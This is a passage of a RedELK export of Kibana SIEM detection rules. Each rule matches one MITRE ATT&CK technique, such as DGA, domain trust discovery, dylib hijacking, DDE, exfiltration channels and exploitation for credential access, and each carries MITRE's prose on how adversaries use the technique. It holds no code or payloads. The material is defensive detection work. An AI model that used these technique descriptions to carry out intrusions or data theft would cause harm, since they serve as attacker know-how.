control.[4][6][7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1483","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1483] Domain Generation Algorithms","query":"threat.technique.id: T1483","references":["https://attack.mitre.org/techniques/T1483","https://attack.mitre.org/techniques/T1568/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1483","name":"Domain Generation Algorithms","id":"T1483"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.[1] Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct SID-History Injection, Pass the Ticket, and Kerberoasting.[2][3] Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.[3] The Windows utility Nltest is known to be used by adversaries to enumerate domain trusts.[4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1482","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1482] Domain Trust Discovery","query":"threat.technique.id: T1482","references":["https://attack.mitre.org/techniques/T1482"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1482","name":"Domain Trust Discovery","id":"T1482"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token.\nMultiple ways of delivering exploit code to a browser exist, including:\nA legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.\nMalicious ads are paid for and served through legitimate ad providers.\nBuilt-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.[1]\nTypical drive-by compromise process:\nA user visits a website that is used to host the adversary controlled content.\nScripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.\nThe user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\nUpon finding a vulnerable version, exploit code is delivered to the browser.\nIf exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\nIn some cases a second visit to the website after the initial scan is required before exploit code is delivered.\nUnlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to Steal Application Access Tokens, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1189","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1189] Drive-by Compromise","query":"threat.technique.id: T1189","references":["https://attack.mitre.org/techniques/T1189"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1189","name":"Drive-by Compromise","id":"T1189"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may execute their own malicious payloads by hijacking ambiguous paths used to load libraries. Adversaries may plant trojan dynamic libraries, in a directory that will be searched by the operating system before the legitimate library specified by the victim program, so that their malicious library will be loaded into the victim program instead. MacOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths.\nA common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. [1] [2]\nIf the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1157","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1157] Dylib Hijacking","query":"threat.technique.id: T1157","references":["https://attack.mitre.org/techniques/T1157","https://attack.mitre.org/techniques/T1574/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1157","name":"Dylib Hijacking","id":"T1157"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1157","name":"Dylib Hijacking","id":"T1157"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. [1] [2] [3]\nMicrosoft Office documents can be poisoned with DDE commands [4] [5], directly or through embedded files [6], and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. [7] DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1173","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1173] Dynamic Data Exchange","query":"threat.technique.id: T1173","references":["https://attack.mitre.org/techniques/T1173","https://attack.mitre.org/techniques/T1559/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1173","name":"Dynamic Data Exchange","id":"T1173"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1114","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1114] Email Collection","query":"threat.technique.id: T1114","references":["https://attack.mitre.org/techniques/T1114"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1114","name":"Email Collection","id":"T1114"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.[1] The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.[2][3][4] This technique may be combined with Masquerading to trick the user into granting escalated privileges to malicious code.[2][3] This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1514","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1514] Elevated Execution with Prompt","query":"threat.technique.id: T1514","references":["https://attack.mitre.org/techniques/T1514","https://attack.mitre.org/techniques/T1548/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1514","name":"Elevated Execution with Prompt","id":"T1514"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a Launch Daemon that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.\nThe rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the Launch Daemon configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.[1][2][3]\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.[1][2][3] Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the Launch Daemon service.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1519","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1519] Emond","query":"threat.technique.id: T1519","references":["https://attack.mitre.org/techniques/T1519","https://attack.mitre.org/techniques/T1546/014"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1519","name":"Emond","id":"T1519"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1519","name":"Emond","id":"T1519"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes[1] and to support other malicious activities, including distraction[2], hacktivism, and extortion.[3]\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.[4]\nIn cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.[5]\nFor attacks attempting to saturate the providing network, see Network Denial of Service.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1499","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1499] Endpoint Denial of Service","query":"threat.technique.id: T1499","references":["https://attack.mitre.org/techniques/T1499"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1499","name":"Endpoint Denial of Service","id":"T1499"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.[1] Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.[2]\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical Virtualization/Sandbox Evasion. While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1480","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1480] Execution Guardrails","query":"threat.technique.id: T1480","references":["https://attack.mitre.org/techniques/T1480"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1480","name":"Execution Guardrails","id":"T1480"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.[1][2] These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.[3][4] This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.[5][6][7]\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.[8][9][10][11]\nAdversaries may abuse these native API functions as a means of executing behaviors. Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1106","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1106] Execution through API","query":"threat.technique.id: T1106","references":["https://attack.mitre.org/techniques/T1106"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1106","name":"Execution through API","id":"T1106"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. [1]\nThe module loader can load DLLs:\nvia specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\nvia EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\nvia an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\nvia <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\nAdversaries may use this functionality as a way to execute arbitrary code on a victim system. For example, malware may execute share modules to load additional components or features.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1129","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1129] Execution through Module Load","query":"threat.technique.id: T1129","references":["https://attack.mitre.org/techniques/T1129"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1129","name":"Execution through Module Load","id":"T1129"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.\nExfiltration Over Alternative Protocol can be done using various common operating system utilities such as Net/SMB or FTP.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1048","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1048] Exfiltration Over Alternative Protocol","query":"threat.technique.id: T1048","references":["https://attack.mitre.org/techniques/T1048"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1048","name":"Exfiltration Over Alternative Protocol","id":"T1048"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1041","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1041] Exfiltration Over Command and Control Channel","query":"threat.technique.id: T1041","references":["https://attack.mitre.org/techniques/T1041"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1041","name":"Exfiltration Over Command and Control Channel","id":"T1041"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1011","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1011] Exfiltration Over Other Network Medium","query":"threat.technique.id: T1011","references":["https://attack.mitre.org/techniques/T1011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1011","name":"Exfiltration Over Other Network Medium","id":"T1011"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1052","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1052] Exfiltration Over Physical Medium","query":"threat.technique.id: T1052","references":["https://attack.mitre.org/techniques/T1052"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1052","name":"Exfiltration Over Physical Medium","id":"T1052"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)[1], standard services (like SMB[2] or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.[3] Depending on the flaw being exploited this may include Exploitation for Defense Evasion.\nIf an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.[4][5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1190","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1190] Exploit Public-Facing Application","query":"threat.technique.id: T1190","references":["https://attack.mitre.org/techniques/T1190"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1190","name":"Exploit Public-Facing Application","id":"T1190"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\nSeveral types exist:\nBrowser-based Exploitation\nWeb browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\nOffice Applications\nCommon office and productivity applications such as Microsoft Office are also targeted through Phishing. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\nCommon Third-party Applications\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1203","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1203] Exploitation for Client Execution","query":"threat.technique.id: T1203","references":["https://attack.mitre.org/techniques/T1203"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1203","name":"Exploitation for Client Execution","id":"T1203"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.[1][2] Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1212","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1212] Exploitation for Credential Access","query":"threat.technique.id: T1212","references":["https://attack.mitre.org/techniques/T1212"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1212","name":"Exploitation for Credential Access","id":"T1212"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for Security Software Discovery. The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1211","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1211] Exploitation for Defense Evasion","query":"threat.technique.id: T1211","references":["https://attack.mitre.org/techniques/T1211"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1211","name":"Exploitation for Defense Evasion","id":"T1211"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary 